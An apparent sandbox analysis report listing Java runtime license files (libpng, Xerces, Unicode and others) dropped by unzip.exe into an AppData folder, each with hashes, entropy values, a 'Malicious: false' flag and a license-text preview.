C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\joni.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1103
Entropy (8bit):	5.168987736365996
Encrypted:	false
SSDEEP:	24:jPrRONJHLH0cPP3gtkHw1h39QHGhsUv4eOk4/+jvho3nPR:7tONJbbvE/NQHGhs5eNS3np
MD5:	5F55F0413D96F085F866A61447C75DD0
SHA1:	5046A6A71BB6D7C5B0D20866B4BF6E42C82E362C
SHA-256:	A64783650A077264F0D58DBAE3F9EC2F0E41405692A76D99EFAE148743EE5811
SHA-512:	E99FBC8367DA4CEC5EE2552901E6BE719A75FD8D6BF0FE4476D49EB84A68F37CBCDC213A7A3B40F1AA8FB73400DB5489633D38B1FEADDCC5E563FF8F631A5C49
Malicious:	false
Preview:	## JRuby Joni v2.2.1..### MIT License.```..Copyright (c) 2017 JRuby Team..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,.ARISI

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\jopt-simple.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1115
Entropy (8bit):	5.1870753062508
Encrypted:	false
SSDEEP:	24:jGYniJHxRHuyPP3GtIHw1Gg9QHGhsUv4eOk4/+jvho3nPZ:yYniJzfPvGt7ICQHGhs5eNS3nx
MD5:	3E20D03F3AB0742D0B0A35BA1215FEDD
SHA1:	A68353B6AE21632813BB8CFACC5741703B16FC7E
SHA-256:	EF38F6F236AA85BB2C01160F741F0C02EF1A76B80021E3E85CA8DAFC0A6E2883
SHA-512:	EB5B02852A54E8072C1D75D6D3FD04D921ACC02E37CB5DC63C2EB4818E3F33B3770A71FE97C97ABFAA0D2481EA3650552E6259972350142FBA14BFBE8753C559
Malicious:	false
Preview:	## jopt-simple v3.0..### MIT License.```..Copyright (c) 2004-2009 Paul R. Holser, Jr...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTH

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\jpeg.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3992
Entropy (8bit):	4.656727026124848
Encrypted:	false
SSDEEP:	96:4K84O6ZloAD2/EViOqSeNDYYJjWdyejpsZ:4K8z6AasE4OUIU2sZ
MD5:	78403EDDFD77B7F194AD07541FF1A88C
SHA1:	3A2280A0FC1B05A3CCDCD328E6C9D9D47ABDBC66
SHA-256:	3B0B5D9C7587A7F194966A793D08F9D81F067457A9A68209DC25C908C03998CE
SHA-512:	82A31CC6402B6B1C5D5E527EE93DDF09386AC4CC2CEC2666140FCD38A36993BA8CB799D6280FEC76FC6101370699C0BC831AC9B84DAB5E439CC4052C3C38296D
Malicious:	false
Preview:	## Independent JPEG Group: JPEG release 6b..### JPEG License.```..Must reproduce following license in documentation and/or other materials.provided with distribution:..The authors make NO WARRANTY or representation, either express or implied,.with respect to this software, its quality, accuracy, merchantability, or.fitness for a particular purpose. This software is provided "AS IS",.and you, its user, assume the entire risk as to its quality and accuracy...This software is copyright (C) 1991-1998, Thomas G. Lane..All Rights Reserved except as specified below...Permission is hereby granted to use, copy, modify, and distribute.this software (or portions thereof) for any purpose, without fee,.subject to these conditions:..(1) If any part of the source code for this software is distributed,.then this README file must be included, with this copyright and no-warranty.notice unaltered; and any additions, deletions, or changes to the original.files must be clearly indicated in accompanying do

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\lcms.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	2544
Entropy (8bit):	5.241664488066737
Encrypted:	false
SSDEEP:	48:/XnDiJbbvEP5QH+sfIte36AFO4+XnDtdfObFTgqKJfW4AhYGbhaXWhk:vwsRQHD6eMDTOb6JO3YG6
MD5:	C5171363F0AF89B5F92CE8BD246B60E2
SHA1:	40679BD08FAB9AF1FC97E86582FA781C54A7C5A5
SHA-256:	E9F5F374CB4116ACBD82EC39B0A1F93AB1F5ADFD8C208488BA8F97DE65E86446
SHA-512:	467B0BC885C540FF63F1F8745BB6491C8B71C608BCD73FB45FF039E41EF9C93B64FBDD8B2246789B765024C7D63B8905DCF7B620C1E8774082FF1B8E30BCB852
Malicious:	false
Preview:	## Little Color Management System (LCMS) v2.16..### LCMS License.<pre>..MIT License..Copyright (C) 1998-2023 Marti Maria Saguer..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the Software.is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO.THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHE

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\libpng.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	7195
Entropy (8bit):	4.914544790446352
Encrypted:	false
SSDEEP:	192:SuVlzhu3psX8aB9Mo3AWobRafweOnrQyyi:Suzhu3psX8aB9Mo3kafweOnrQyyi
MD5:	636B218922CC1DB4734D964510F3B817
SHA1:	D5D57E82EE4AE413032A4030192A7AC0330BE0C1
SHA-256:	26429C1EB65DB41CAC81999BEBD705A60A5DBA1D837664E4CC94F54D5867D818
SHA-512:	B210DF0B66226E04D4FB1F3F20B6CD49A833E64869FE72DA3426481C3DC9735628801E590BAFCF382DB2EFDA44BC7C1C8067C7DADC64016D784EEDCF029A0732
Malicious:	false
Preview:	## libpng v1.6.43..### libpng License.<pre>..COPYRIGHT NOTICE, DISCLAIMER, and LICENSE.=========================================..PNG Reference Library License version 2.---------------------------------------..Copyright (C) 1995-2024 The PNG Reference Library Authors..Copyright (C) 2018-2024 Cosmin Truta.Copyright (C) 1998-2018 Glenn Randers-Pehrson.Copyright (C) 1996-1997 Andreas Dilger.Copyright (C) 1995-1996 Guy Eric Schalnat, Group 42, Inc...The software is supplied "as is", without warranty of any kind,.express or implied, including, without limitation, the warranties.of merchantability, fitness for a particular purpose, title, and.non-infringement. In no event shall the Copyright owners, or.anyone distributing the software, be liable for any damages or.other liability, whether in contract, tort or otherwise, arising.from, out of, or in connection with the software, or the use or.other dealings in the software, even if advised of the possibility.of such damage...Permission is he

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\mesa3d.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	5732
Entropy (8bit):	5.1453426112774965
Encrypted:	false
SSDEEP:	96:FqsVQHfoGKlxESLI1GXVsCGQHlzQUGP+0nWeHGT+weUGP+0nWeHGT+wI:RQHfh4hE1GX1GQH9pqnWeHGySqnWeHGK
MD5:	B0F646AC99116CABE48CF7D0A43708B1
SHA1:	60228B860A66176C2FAFFA048079103E5F4B69D8
SHA-256:	4B326D2B6BC09DA510E3D0F3A1EFF9E26C0E023C309858B6585016EE662C9661
SHA-512:	B739AD6B4DC39AD0E2268EA60243DCC11A6A236A0A04488AACBF0103D0C754F1FFC405EC99EAC95A56C312FC63BBE99BA51A1F33D69DFDE37F74979B51732C3F
Malicious:	false
Preview:	## Mesa 3-D Graphics Library v21.0.3..### Mesa License.```..Copyright (C) 1999-2007 Brian Paul All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\pkcs11cryptotoken.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	3924
Entropy (8bit):	4.826334543557357
Encrypted:	false
SSDEEP:	48:+tC/GvWZpnLtVVuXdfgnWTRshYzxkhXSWR1kM8oT6i6hqgamulkbXdrRjNYRTh5a:vGObLxI0W6hCukJe6i6HDXdrRkTL2
MD5:	86CF531AE15B0B5BACAE5F941A6E6750
SHA1:	0C036D2463FA269FE183BEBB2EDB637CFDB740D2
SHA-256:	B56823253DBA233573F153696A343505832716A050C2AB203C94073F30B63260
SHA-512:	ECF934E7F10FBB6808725C310024921CF7E4F03B5EAF1AAEA774DC72D5DFA8DB171CECA791C6C8E00143CDFC34D639043C822D9EBBC307C9C3ADB8C316229254
Malicious:	false
Preview:	## OASIS PKCS #11 Cryptographic Token Interface v3.0..### OASIS PKCS #11 Cryptographic Token Interface License.<pre>..Copyright . OASIS Open 2020. All Rights Reserved... All capitalized terms in the following text have the meanings.assigned to them in the OASIS Intellectual Property Rights Policy (the."OASIS IPR Policy"). The full Policy may be found at the OASIS website:.[http://www.oasis-open.org/policies-guidelines/ipr].. This document and translations of it may be copied and furnished to.others, and derivative works that comment on or otherwise explain it or.assist in its implementation may be prepared, copied, published, and.distributed, in whole or in part, without restriction of any kind,.provided that the above copyright notice and this section are included.on all such copies and derivative works. However, this document itself.may not be modified in any way, including by removing the copyright.notice or references to OASIS, except as needed for the purpose of.developing

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\pkcs11wrapper.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2126
Entropy (8bit):	5.172589746189614
Encrypted:	false
SSDEEP:	48:Bu9OOrXIJHJzI/NNl+eMuj2PMicp32srF32sZEtY17wBHN:5OrXIJHJz+NFMwhp3131EBt
MD5:	65933EB0FA6B3C3E93FB30B2F2613131
SHA1:	B1783DDCB9E112987DEB97E14D30BE27DF7061D0
SHA-256:	12DD724A8014735DEC61B95CA4417476688C07DD1550CC9C1071637806E232A0
SHA-512:	4F784BCEA1D66EAA7C56C31D3F2D00061963CA1B437774DBBB7BDBB3E62F92FF426419E075D8FEB82A2F984FAEE4B1573DD175D0C152699B8BBE3313EBC18FAF
Malicious:	false
Preview:	## IAIK (Institute for Applied Information Processing and Communication) PKCS#11 wrapper files v1..### IAIK License.```..Copyright (c) 2002 Graz University of Technology. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...3. The end-user documentation included with the redistribution, if any, must. include the following acknowledgment:.. "This product includes software developed by IAIK of Graz University of. Technology.".. Alternately, this acknowledgment may appear in the software itself, if and. wherever such third-party

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\relaxngcc.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2126
Entropy (8bit):	5.219606113828308
Encrypted:	false
SSDEEP:	48:PXC6OOrXIJHJz8uCltNonuP7gPrCp32sr3u9tk3hEtI33tEFHN:QOrXIJHJzGoCp3Huzk3h9OFt
MD5:	7A73168E2D1D60635D4A477735EF9C46
SHA1:	03698BDDF01C463ED4ADD5707136A067F9446551
SHA-256:	DA023D685DCF9206EBA77AFF21957E09633084903991BA422625D41EF18E6073
SHA-512:	8122E4B9D698632B36085C9A334883756B4499EE5CBB80760F3B1C31D50C9121F788B838664171CCEF20CEBFFA04723D7536004F6DBF31174EDDF2825A55B8D5
Malicious:	false
Preview:	## RelaxNGCC v 1.12..### RelaxNGCC License..```..Copyright (c) 2000-2003 Daisuke Okajima and Kohsuke Kawaguchi. .All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...3. The end-user documentation included with the redistribution, if any, must. include the following acknowledgment:.. "This product includes software developed by Daisuke Okajima. and Kohsuke Kawaguchi (http://relaxngcc.sf.net/)."..Alternately, this acknowledgment may appear in the software itself, if and.wherever such third-party acknowledgments normally appear...

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\relaxngdatatype.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Algol 68 source, ASCII text
Category:	dropped
Size (bytes):	1597
Entropy (8bit):	5.129158378658016
Encrypted:	false
SSDEEP:	48:OIx0OOYrYJeNrYJFSEz4943J/32sBEtI33tEHN:l0bYrYJeNrYJFSAN393d9ut
MD5:	19C79CD6C27E7AA0E4AE4AE2F8D25F66
SHA1:	2B95E8949E7D1DCA8DCFC4D822357863FE67341E
SHA-256:	8454B0B740CD1FDB98B9A5D56685C872B1C548B6308E5A8E8CFE2164474AC53C
SHA-512:	4A98ACC829DC48E185FE418A7DDE6A51C497C343E2C36A2F5CADE2BF7C0DE4AAC8BA8C0F08843BFDEEA23DA72D3FE09EFE877E68F890174F1DFF44B0D143D7B2
Malicious:	false
Preview:	## RelaxNG Datatype v1.0..### RelaxNG Datatype License.```..Copyright (c) 2005, 2010 Thai Open Source Software Center Ltd.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer... Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in. the documentation and/or other materials provided with the. distribution... Neither the names of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived. from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.LIMITED TO, THE IMPLI

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\relaxngom.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	5.234479012488585
Encrypted:	false
SSDEEP:	24:jcrmJHHH0yN3gtsaLhP9QHOsUv4eOk4/+/m3oqLFj:4aJHlxE3fQHOs5exm3ogFj
MD5:	F566A60D7E2A16EBF1C9D8938635C269
SHA1:	5B796B99C8060C4E4AD467A83C859C458A27EA3B
SHA-256:	075A8114166C0875C6625312758040FC4514B3893F185452BC73EF5321875947
SHA-512:	29118160766447EF8732B9EBE65E1F67F6C7544FCF26A110A967281F0C6DD8FC7858C77B639DA5DFE96D502BA16C03D9710FFE95847150977F393AC77DC8B422
Malicious:	false
Preview:	## RelaxNG Object Model/Parser (RNGOM.jar) v20050510..### RelaxNG Object Model/Parser License.```.Copyright (C) Kohsuke Kawaguchi 2004-2011..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions: The above copyright.notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIA

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\santuario.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11499
Entropy (8bit):	4.576057024985053
Encrypted:	false
SSDEEP:	192:3EASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1XkTYst3N:0xNRrM21TiA+8VL+EKdXNt9xkTYE3N
MD5:	F1B6983F8BCB77CE3A2D8311A29B346B
SHA1:	061384A9AD86CA4CF8DF2E5421E73E6F5BCCC22B
SHA-256:	B7764B61731D4EE9567B090F34D02237AFCFB0377E5D1136C7AD3EF345CC4937
SHA-512:	3E9162F0A57A42A1E2F95F212E9439648960AE1BE5721CC90213CC5C2CDFB5CFC2A639DBA26A914FD8CA3D4B8F2D7259EB9911C65E6DC190031C303F57FD0650
Malicious:	false
Preview:	## Apache Santuario v3.0.3..### Apache 2.0 License.```.. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) benefic

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\siphash.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (460)
Category:	dropped
Size (bytes):	8256
Entropy (8bit):	4.760400810814045
Encrypted:	false
SSDEEP:	192:jlQHnQrKIp4nw+ymHidjV20EaPdmzL9pq1:BWtImilzmf61
MD5:	2E9741435C8ABF33ACCC005F6FFE5AEF
SHA1:	A666FB9D1D19D713EE9055DBAEC4ADC1DFF03DAE
SHA-256:	5A792B5A74AD2A5F3D6A7AD8B7A841116E58A772C18BC6E392320A365B222C76
SHA-512:	4DC96C93E28152C6A832BF58BC912ADA7D399D0E3180AE5A53A30DE0332672C25A2606EA9EA5333A9B6A83F9F42428A08F761B68D41BA087D7E8EEE65DAB45C6
Malicious:	false
Preview:	## SipHash v1.0-68c8a7c..### Notice.SipHash reference C implementation..```. Copyright (c) 2016 Jean-Philippe Aumasson <jeanphilippe.aumasson@gmail.com>.. To the extent possible under law, the author(s) have dedicated all copyright. and related and neighboring rights to this software to the public domain. worldwide. This software is distributed without any warranty... You should have received a copy of the CC0 Public Domain Dedication along. with. this software. If not, see. <http://creativecommons.org/publicdomain/zero/1.0/>..```..### Licenses.The code is dual-licensed CCO and MIT..#### MIT License.```.Copyright 2012-2024 JP Aumasson..Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to per

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\thaidict.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1341
Entropy (8bit):	5.134396092780326
Encrypted:	false
SSDEEP:	24:jLrwAkIL2LjjWrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFj:fEAk+2LnWaJHlxE3dQHOs5exm3ogFj
MD5:	38E321EF31B7429D8A717525CC85CA8E
SHA1:	80B2B391C1FF687D693218D72ACA31C190B4FDAD
SHA-256:	B9B6B1D88C6FCD67DC6D5869731A4A29ED7CFDD0D3503FD7216924A9C007070D
SHA-512:	17F701624384E9F276D0CB5083AC04AFFD348651278F9F9D65C8D84ACCAA9A6E2B56318B633FD496632E5AAF0F87E725F07AD827498723D87F8E3AFCE6DC9AEE
Malicious:	false
Preview:	## Thai Dictionary..### Thai Dictionary License.```..Copyright (C) 1982 The Royal Institute, Thai Royal Government...Copyright (C) 1998 National Electronics and Computer Technology Center,.National Science and Technology Development Agency,.Ministry of Science Technology and Environment,.Thai Royal Government...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTI

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\unicode.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	2398
Entropy (8bit):	5.11945767410343
Encrypted:	false
SSDEEP:	48:4gcg0AhuAYWFkXVJz4KMA5cyBlPhBmztuztw/qHasjIGBcBrIqptPrfEF0L:4nXAhwZnz4WzPSzUzqiHBc1jDPrfhL
MD5:	288EC55B4B45C6C13EB50B339D180CC8
SHA1:	8EABFCD5C0DE57F253A016618EBF3E02543C85DD
SHA-256:	90333C7083132BE31A9A29E3D64BB16C438204678152C40FF96B1508C168EE93
SHA-512:	9732852C7F069E6DDA5C58D2677F3A39E6F105DA0117C60C961DAA0A509EADBBBAA393F65D96CF8603ECDF8DA97954295721389F28A2E9CB0081A734B459B021
Malicious:	false
Preview:	## Unicode Character Database v6.2 ..### Unicode Character Database..```. UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE.. See Terms of Use for definitions of Unicode Inc.'s. Data Files and Software... NOTICE TO USER: Carefully read the following legal agreement.. BY DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S. DATA FILES ("DATA FILES"), AND/OR SOFTWARE ("SOFTWARE"),. YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND BY, ALL OF THE. TERMS AND CONDITIONS OF THIS AGREEMENT.. IF YOU DO NOT AGREE, DO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE. THE DATA FILES OR SOFTWARE... COPYRIGHT AND PERMISSION NOTICE. Copyright . 1991-2019 Unicode, Inc. All rights reserved.. Distributed under the Terms of Use in https://www.unicode.org/copyright.html... Permission is hereby granted, free of charge, to any person obtaining. a copy of the Unicode data files and any associated documentation. (the "Data Files") or Unicode software and any associated documentation. (the

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\xalan.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	12261
Entropy (8bit):	4.620619581270765
Encrypted:	false
SSDEEP:	192:+2dz8wEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1Xk9:tlsxNRrM21TiA+8VL+EKdXNt9xkTYE39
MD5:	5C1D5DC913699935CA4A3B6299C0E8E3
SHA1:	DFFCD39166D57E3CB1DA9621DE7EF574872FB932
SHA-256:	4C228A370A7554B10625AD7E8CCF76703EE4C12251AAE803FD4D7F8E5DAEDC9A
SHA-512:	FCF4389EDB08842FF7B33E7112FA4033AA3DD3D1254B45D2F758194E3B34CF8C89AD295E229354F6CEE532634383D335BE1E002CDC4A5BB9D807FA54FADB6A74
Malicious:	false
Preview:	## Apache Xalan v2.7.3..### Apache Xalan Notice.```.. ======================================================================================. == NOTICE file corresponding to the section 4d of the Apache License, Version 2.0, ==. == in this case for the Apache Xalan distribution. ==. ======================================================================================.. This product includes software developed by. The Apache Software Foundation (http://www.apache.org/)... Specifically, we only include the XSLTC portion of the source from the Xalan distribution. . The Xalan project has two processors: an interpretive one (Xalan Interpretive) and a . compiled one (The XSLT Compiler (XSLTC)). We only use the XSLTC part of Xalan; We use. the source from the packages that are part of the XSLTC sources... Portions of this software was originally based on the following:.. - software copyright (c) 1999-2002, Lotus Development Co

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\xerces.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11842
Entropy (8bit):	4.611715701079404
Encrypted:	false
SSDEEP:	192:ZNuXXEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1XkT5:ZgExNRrM21TiA+8VL+EKdXNt9xkTYE39
MD5:	E951EEF9E852F6CC58B0B8AE922B31DC
SHA1:	175CA0CBD66E5FB5A65499D7DD28184E828B347E
SHA-256:	A0237ECA7D0D59349878E4572F907DF093B81AEE16CDE1FBBB402276B4AD69CE
SHA-512:	2CE1FA80A39B50C99B10B7A46E703FDC1C20AC75E187B0729536A9FCAF1AA7DCD1C1021730205DE3F1137C68FC7CE73C0F6E869B97ADAB4391753076BA021497
Malicious:	false
Preview:	## Apache Xerces v2.12.2..### Apache Xerces Notice.```. =========================================================================. == NOTICE file corresponding to section 4(d) of the Apache License, ==. == Version 2.0, in this case for the Apache Xerces Java distribution. ==. =========================================================================. . Apache Xerces Java. Copyright 1999-2022 The Apache Software Foundation.. This product includes software developed at. The Apache Software Foundation (http://www.apache.org/)... Portions of this software were originally based on the following:. - software copyright (c) 1999, IBM Corporation., http://www.ibm.com.. - software copyright (c) 1999, Sun Microsystems., http://www.sun.com.. - voluntary contributions made by Paul Eng on behalf of the. Apache Software Foundation that were originally developed at iClick, Inc.,. software copyright (c) 1999..```..### Apache 2.0 License.```..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\xmlresolver.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11350
Entropy (8bit):	4.573308481728409
Encrypted:	false
SSDEEP:	192:0rFEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1XkTYs7:ESxNRrM21TiA+8VL+EKdXNt9xkTYE3N
MD5:	32AFC0BB251A45D500B1CA3E4F139868
SHA1:	53397311C094A4013D988D7691AF8EDED9E47EB5
SHA-256:	52F0F96EE75D0F48655C450D655F10CC90CA0502A862660DF048FD1DD9C02258
SHA-512:	23ED52B27F1B8429AB3CE71E0DB5A563837FA12FF3631272BE06B29A6825F0F72AF0281620063ECD0780997E6AC15F7081E19F5F2011041BEE5A9737C653F0E9
Malicious:	false
